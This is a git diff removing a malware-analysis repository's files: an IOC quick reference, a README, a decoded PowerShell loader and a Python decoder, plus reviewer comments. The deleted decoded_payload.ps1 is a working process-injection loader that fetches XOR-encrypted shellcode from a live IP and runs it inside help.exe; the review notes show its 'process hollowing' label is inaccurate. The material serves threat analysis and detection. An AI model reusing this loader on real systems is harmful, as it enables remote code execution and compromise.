@@ -1,132 +0,0 @@ -# Quick Reference - Malware Analysis - -## 🔴 THREAT CLASSIFICATION: CRITICAL MALWARE - ---- - -## What It Does (Simple Explanation) - -This is a **malicious script** that: -1. Downloads encrypted malware from a hacker's server -2. Decrypts it using XOR encryption -3. Injects the malware into a legitimate Windows program (help.exe) -4. Executes the malware while hiding it from detection - ---- - -## Key Information - -### Malicious Server -- **IP Address:** `45.83.140.12` -- **Download URL:** `http://45.83.140.12/pot/jack/logo.bin` - -### Target Process -- **Injection Target:** `c:\windows\SysWOW64\help.exe` - -### Attack Type -- **Category:** Process Injection / Code Injection -- **Method:** Process Hollowing -- **Language:** PowerShell (hidden) - ---- - -## Malicious Behavior Checklist - -- ✅ Downloads code from internet -- ✅ Uses encryption (XOR) -- ✅ Injects code into other processes -- ✅ Runs hidden (minimized window) -- ✅ Uses multiple encoding layers -- ✅ Manipulates Windows memory directly -- ✅ Creates threads in other processes - ---- - -## How to Protect Yourself - -### If You Haven't Run It -✅ Delete it immediately -✅ Block the IP address: `45.83.140.12` -✅ Scan your computer with antivirus - -### If You Already Ran It -🚨 **Your computer may be compromised** - -1. Disconnect from internet immediately -2. Run full antivirus scan -3. Check for suspicious processes (especially help.exe) -4. Contact IT security team -5. Consider professional malware removal -6. Change all passwords from a clean device - ---- - -## Technical Details (For Security Professionals) - -### Obfuscation Layers -1. Batch wrapper → 2. PowerShell scriptblock → 3. Hex encoding → 4. 
XOR encryption - -### API Functions Used -- `CreateProcess` (CREATE_SUSPENDED flag) -- `VirtualAllocEx` (PAGE_EXECUTE_READWRITE) -- `WriteProcessMemory` -- `CreateRemoteThread` -- `WaitForSingleObject` - -### Memory Permissions -- `0x40` = PAGE_EXECUTE_READWRITE (RWX - highly suspicious) -- `0x1000` = MEM_COMMIT - ---- - -## Detection Signatures - -### PowerShell Command Line -``` -Contains: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, -bxor -``` - -### Network Traffic -``` -HTTP GET to 45.83.140.12/pot/jack/logo.bin -``` - -### Process Behavior -``` -help.exe spawned by PowerShell with unusual memory allocations -``` - ---- - -## MITRE ATT&CK Techniques -- T1059.001 - PowerShell -- T1055.012 - Process Hollowing -- T1027 - Obfuscated Files -- T1140 - Deobfuscate/Decode -- T1071.001 - Web Protocols - ---- - -## Files Generated by Analysis - -1. **MALWARE_ANALYSIS_REPORT.md** - Full technical analysis -2. **decoded_payload.ps1** - Decoded PowerShell code (DO NOT RUN) -3. **decrypt_payload.py** - Python decryption script -4. **QUICK_REFERENCE.md** - This file - ---- - -## Bottom Line - -⚠️ **This is REAL malware designed to compromise Windows systems.** - -- **DO NOT** run this code -- **DO NOT** click links in suspicious emails -- **DO** keep antivirus updated -- **DO** report to security team if found in your organization - ---- - -**Date:** December 29, 2025 -**Threat Level:** 🔴 CRITICAL -**Malware Type:** Dropper/Loader with Process Injection diff --git a/README.md b/README.md deleted file mode 100644 index 69f14dd..0000000 --- a/README.md +++ /dev/null 
@@ -1,222 +0,0 @@ -# Malware Analysis - Payload Decryption and Analysis - -This repository contains a complete analysis of an obfuscated malicious Windows batch/PowerShell script that employs process injection techniques. - -## 🔴 CRITICAL WARNING - -**This repository contains analysis of REAL malware. DO NOT execute any of the decoded payloads.** - ---- - -## Overview - -The analyzed malware is a multi-stage dropper/loader that: -- Downloads encrypted shellcode from a remote server -- Decrypts the payload using XOR encryption -- Injects malicious code into legitimate Windows processes -- Executes using process hollowing techniques - ---- - -## Files in This Repository - -### Analysis Reports -- **[MALWARE_ANALYSIS_REPORT.md](MALWARE_ANALYSIS_REPORT.md)** - Comprehensive technical analysis -- **[QUICK_REFERENCE.md](QUICK_REFERENCE.md)** - Quick reference guide and IOCs - -### Decoded Payloads (DO NOT EXECUTE) -- **[decoded_payload.ps1](decoded_payload.ps1)** - Decoded PowerShell malware - -### Analysis Tools -- **[decrypt_payload.py](decrypt_payload.py)** - Python script to decode the hex-encoded payload - ---- - -## Quick Summary - -### Threat Level -🔴 **CRITICAL** - -### Malware Type -- Dropper/Loader -- Process Injection -- Shellcode Execution - -### Key IOCs - -**Malicious Infrastructure:** -``` -IP: 45.83.140.12 -URL: http://45.83.140.12/pot/jack/logo.bin -``` - -**Injection Target:** -``` -Process: c:\windows\SysWOW64\help.exe -``` - -### MITRE ATT&CK Techniques -- T1059.001 - PowerShell -- T1055.012 - Process Hollowing -- T1027 - Obfuscated Files or Information -- T1140 - Deobfuscate/Decode Files or Information -- T1071.001 - Web Protocols - ---- - -## How to Use This Analysis - -### For Security Analysts -1. Read the **MALWARE_ANALYSIS_REPORT.md** for detailed technical analysis -2. Use the IOCs to search your environment for compromise indicators -3. Implement the detection rules and defensive measures -4. 
Review the MITRE ATT&CK mappings for threat hunting - -### For Incident Responders -1. Check **QUICK_REFERENCE.md** for immediate IOCs -2. Block the malicious IP address: `45.83.140.12` -3. Hunt for the process injection patterns in your environment -4. Review PowerShell logs for similar obfuscation patterns - -### For Researchers -1. Examine the **decoded_payload.ps1** to understand the attack flow -2. Use **decrypt_payload.py** as a template for analyzing similar samples -3. Study the multi-layer obfuscation techniques employed - ---- - -## Running the Decryption Script - -To analyze the payload: - -```bash -python3 decrypt_payload.py -``` - -This will display: -- The decoded PowerShell payload -- Analysis summary -- IOCs -- Recommendations - ---- - -## Key Findings - -### Attack Flow -1. Batch script launches PowerShell in minimized window -2. PowerShell decodes hex-encoded payload -3. Creates Windows API bindings for process manipulation -4. Downloads encrypted shellcode from `45.83.140.12` -5. XOR-decrypts the payload using first byte as key -6. Creates suspended `help.exe` process -7. Injects shellcode into process memory -8. Executes malicious payload via remote thread - -### Evasion Techniques -- Multi-layer encoding (Batch → PowerShell → Hex → XOR) -- Minimized window execution -- Process injection to hide in legitimate process -- In-memory execution (fileless) -- XOR encryption of final payload - ---- - -## Recommendations - -### Immediate Actions -- ✅ Block IP address: `45.83.140.12` -- ✅ Enable PowerShell logging -- ✅ Monitor for process injection indicators -- ✅ Deploy EDR solution -- ✅ Scan systems for IOCs - -### Detection Rules -- Alert on `CreateRemoteThread` + `WriteProcessMemory` patterns -- Monitor PowerShell with long encoded commands -- Flag suspicious `help.exe` executions -- Detect XOR operations on downloaded content - ---- - -## Defensive Measures - -1. 
**Network Security** - - Block malicious IPs - - Monitor unusual HTTP connections - - Implement DNS filtering - -2. **Endpoint Security** - - Enable PowerShell logging (Script Block, Module, Transcription) - - Use Application Whitelisting - - Deploy EDR - - Enable AMSI - -3. **User Awareness** - - Train users on phishing - - Warn about suspicious attachments - - Implement email filtering - ---- - -## Technical Specifications - -**Programming Languages:** -- Windows Batch Script -- PowerShell -- C# (for P/Invoke declarations) - -**APIs Used:** -- `kernel32.dll` functions -- `CreateProcess` -- `VirtualAllocEx` -- `WriteProcessMemory` -- `CreateRemoteThread` - -**Encryption:** -- XOR with single-byte key (first byte of payload) - -**Network Protocol:** -- HTTP (unencrypted) - ---- - -## Disclaimer - -This analysis is provided for **educational and defensive purposes only**. The decoded malware samples are included to help security professionals understand the threat and develop appropriate defenses. - -**DO NOT:** -- Execute any of the decoded payloads -- Use this information for malicious purposes -- Access the malicious infrastructure - -**DO:** -- Use this analysis to protect your organization -- Share IOCs with your security team -- Implement the recommended defensive measures - ---- - -## Analysis Metadata - -- **Analysis Date:** December 29, 2025 -- **Malware Family:** Unknown (requires payload analysis) -- **Threat Actor:** Unknown -- **Campaign:** Unknown -- **Analysis Status:** Complete - ---- - -## Contact - -For questions about this analysis or to report similar samples, please consult with your organization's security team. - ---- - -## License - -This analysis is provided as-is for security research and defensive purposes. - ---- - -**Stay safe and keep your systems secure! 🛡️** diff --git a/decoded_payload.ps1 b/decoded_payload.ps1 deleted file mode 100644 index a2b38ce..0000000 --- a/decoded_payload.ps1 +++ /dev/null 
@@ -1,101 +0,0 @@ -# ============================================================================ -# DECODED MALICIOUS POWERSHELL PAYLOAD -# ============================================================================ -# WARNING: DO NOT EXECUTE THIS CODE - FOR ANALYSIS ONLY -# This is the decoded version of the hex-encoded malware payload -# ============================================================================ - -Add-Type -TypeDefinition @" -using System; -using System.Diagnostics; -using System.Runtime.InteropServices; -[StructLayout(LayoutKind.Sequential)] -public struct PROCESS_INFORMATION -{ - public IntPtr hP; - public IntPtr ht; - public uint dwProcessId; - public uint dwThreadId; -} -[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] -public struct STARTUPINFO -{ - public uint cb; - public string lpReserved; - public string lpDesktop; - public string lpTitle; - public uint dwX; - public uint dwY; - public uint dwXSize; - public uint dwYSize; - public uint dwXCountChars; - public uint dwYCountChars; - public uint dwFillAttribute; - public uint dwFlags; - public uint wShowWindow; - public short cbReserved2; - public IntPtr lpReserved2; - public IntPtr hStdInput; - public IntPtr hStdOutput; - public IntPtr hStdError; -} -public static class Kernel32 -{ - [DllImport("kernel32.dll")] - public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j); - [DllImport("kernel32.dll")] - public static extern IntPtr GlobalAlloc(uint a,uint b); - [DllImport("kernel32.dll")] - public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint e); - [DllImport("kernel32.dll")] - public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint d,IntPtr e); - [DllImport("kernel32.dll")] - public static extern IntPtr WaitForSingleObject(IntPtr a,uint b); - [DllImport("kernel32.dll")] - public static extern IntPtr CreateRemoteThread(IntPtr 
a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g); -} -"@ - -# Download encrypted shellcode from malicious server -$webClient = New-Object System.Net.WebClient -$url = "http://45.83.140.12/pot/jack/logo.bin" - -$shellbuf = $webClient.DownloadData($url) -$shellsize = $shellbuf.Length - -# XOR decrypt the downloaded payload using first byte as key -for ($i = 1; $i -lt $shellsize; $i++) { - $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] -} - -# Initialize structures for process creation -$si = New-Object STARTUPINFO; -$pi = New-Object PROCESS_INFORMATION; - -# Allocate global memory for shellcode -$addr = [Kernel32]::GlobalAlloc(0x40, $shellsize + 100); - -# Copy decrypted shellcode to allocated memory -for ($i = 1;$i -lt $shellsize;$i++){ - [System.Runtime.InteropServices.Marshal]::WriteByte($addr, $i - 1, $shellbuf[$i]); -} - -# Create suspended process (help.exe) for injection -# Flag 0x04 = CREATE_SUSPENDED -[Kernel32]::CreateProcess("c:\windows\SysWOW64\help.exe",0,0,0,0,0x04,0,"c:",[ref] $si,[ref] $pi); - -# Get handle to created process -$kZZZZ=$pi.hP; - -# Allocate memory in target process with RWX permissions -# 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE -$mZZZZ=[Kernel32]::VirtualAllocEx($kZZZZ,0,$shellsize + 100,0x1000,0x40); - -# Write shellcode to target process memory -[Kernel32]::WriteProcessMemory($kZZZZ,$mZZZZ,$addr, $shellsize, 0); - -# Create remote thread in target process to execute shellcode -$lZZZZ = [Kernel32]::CreateRemoteThread($kZZZZ, 0, 0, $mZZZZ, 0, 0, 0); - -# Wait for shellcode execution (500 seconds timeout) -[Kernel32]::WaitForSingleObject($lZZZZ, 500*1000); diff --git a/decrypt_payload.py b/decrypt_payload.py deleted file mode 100644 index c9867fb..0000000 --- a/decrypt_payload.py +++ /dev/null 
@@ -1,95 +0,0 @@ -#!/usr/bin/env python3 -""" -Payload Decryption and Analysis Script -This script safely decodes obfuscated malicious code without executing it. -""" - -def hex_to_string(hex_string): - """Convert hex string to ASCII string""" - result = "" - for i in range(0, len(hex_string), 2): - hex_byte = hex_string[i:i+2] - result += chr(int(hex_byte, 16)) - return result - -def main(): - # The hex-encoded payload from the malicious script - hex_payload = "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" - - print("=" * 80) - print("MALWARE ANALYSIS REPORT") - print("=" * 80) - print() - - # Decode the hex payload - decoded = hex_to_string(hex_payload) - - print("DECODED POWERSHELL PAYLOAD:") - print("-" * 80) - print(decoded) - print() - - print("=" * 80) - print("ANALYSIS SUMMARY") - print("=" * 80) - print() - print("⚠️ THREAT LEVEL: CRITICAL - This is MALICIOUS CODE") - print() - print("What this malware does:") - print() - print("1. PROCESS INJECTION TECHNIQUE:") - print(" - Creates Windows API definitions for process manipulation") - print(" - Uses kernel32.dll functions for memory manipulation") - print() - print("2. DOWNLOADS MALICIOUS PAYLOAD:") - print(" - URL: http://45.83.140.12/pot/jack/logo.bin") - print(" - Downloads binary shellcode from a remote server") - print() - print("3. XOR DECRYPTION:") - print(" - The downloaded payload is XOR-encrypted") - print(" - Uses first byte as the XOR key to decrypt the rest") - print(" - This obfuscates the actual malicious code") - print() - print("4. PROCESS INJECTION:") - print(" - Creates a suspended process: c:\\windows\\SysWOW64\\help.exe") - print(" - Allocates memory in the target process") - print(" - Writes the decrypted shellcode into the process memory") - print(" - Creates a remote thread to execute the injected code") - print(" - Waits for execution (500 seconds timeout)") - print() - print("5. 
EXECUTION METHOD:") - print(" - Runs in a minimized window to avoid detection") - print(" - Uses multiple encoding layers (hex encoding)") - print(" - Employs process hollowing/injection techniques") - print() - print("=" * 80) - print("INDICATORS OF COMPROMISE (IOCs)") - print("=" * 80) - print() - print("Malicious IP/URL:") - print(" - 45.83.140.12") - print(" - http://45.83.140.12/pot/jack/logo.bin") - print() - print("Targeted Process:") - print(" - c:\\windows\\SysWOW64\\help.exe") - print() - print("Techniques Used:") - print(" - T1055 - Process Injection") - print(" - T1055.012 - Process Hollowing") - print(" - T1027 - Obfuscated Files or Information") - print(" - T1140 - Deobfuscate/Decode Files or Information") - print(" - T1059.001 - PowerShell") - print() - print("=" * 80) - print("RECOMMENDATIONS") - print("=" * 80) - print() - print("1. DO NOT execute this code") - print("2. Block the malicious IP address: 45.83.140.12") - print("3. Scan your system with updated antivirus software") - print("4. Check for signs of compromise if this was executed") - print("5. Report this to your security team immediately") - print() - -if __name__ == "__main__": - main()
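Review bot: the QUICK_REFERENCE.md hunk is a deletion (`deleted file mode 100644`, `+++ /dev/null`, `@@ -1,132 +0,0 @@`), while the README.md hunk in the same patch lists QUICK_REFERENCE.md, decoded_payload.ps1 and decrypt_payload.py under "Files in This Repository" and links to them. Either the diff direction is inverted or the README is left pointing at files that no longer exist; confirm which is intended before merging. Separately, "Method: Process Hollowing" and "T1055.012 - Process Hollowing" under "MITRE ATT&CK Techniques" do not match the behaviour documented in the same file: the loader creates a suspended `help.exe`, allocates new RWX memory with `VirtualAllocEx`, writes shellcode there and starts it with `CreateRemoteThread`. Hollowing unmaps or overwrites the host image, which this code never does, so the parent technique T1055 (Process Injection) is the accurate mapping.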
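Review bot: in the README.md hunk, "Executes using process hollowing techniques" under "Overview" and "T1055.012 - Process Hollowing" under "MITRE ATT&CK Techniques" contradict the "Attack Flow" list a few lines below, which correctly describes suspended-process creation, `VirtualAllocEx`, `WriteProcessMemory` and a remote thread with no unmapping of the original image. Replace the hollowing label with T1055 (Process Injection) so the README, QUICK_REFERENCE.md and the full report agree. The "Running the Decryption Script" section also promises that `python3 decrypt_payload.py` prints "Analysis summary", "IOCs" and "Recommendations"; per the decrypt_payload.py hunk those are hard-coded strings, not output derived from the decoded payload, so the README should not present the script as a general-purpose analysis tool or as "a template for analyzing similar samples" without that caveat.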
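Review bot: the decoded_payload.ps1 hunk stores the deobfuscated loader as a directly executable `.ps1` with the live download URL `http://45.83.140.12/pot/jack/logo.bin` intact, so a double-click or an unrestricted execution policy runs it despite the header banner. Store the decoded copy with a non-executable extension (for example `decoded_payload.ps1.txt`) and defang the URL (`hxxp://45[.]83[.]140[.]12/...`) while keeping the original in the report's IOC section. One comment is also inaccurate: "Copy decrypted shellcode to allocated memory" copies `$shellsize - 1` bytes starting at offset 1 (the key byte is skipped), but the later `WriteProcessMemory` call copies `$shellsize` bytes, so one zeroed byte from the `+ 100` GlobalAlloc slack is written as well; analysts reading the decoded copy will rely on these comments, so note the off-by-one there.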
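Review bot: in the decrypt_payload.py hunk, everything under "ANALYSIS SUMMARY", "INDICATORS OF COMPROMISE (IOCs)" and "RECOMMENDATIONS" is a fixed block of `print()` calls that never reads `decoded`, so changing `hex_payload` to a different sample leaves the printed IOCs and technique list unchanged and wrong. Derive at least the URL, IP and API names from `decoded` (a regex for `https?://\S+` and for the `Kernel32` method names is enough) or drop the summary from the script and keep it in the report. `hex_to_string` should also use `bytes.fromhex(hex_string).decode("latin-1")` instead of a per-byte `chr(int(...))` loop: it is faster, raises a clear `ValueError` on odd-length or non-hex input rather than failing on a two-character slice, and preserves any non-ASCII bytes in the payload verbatim.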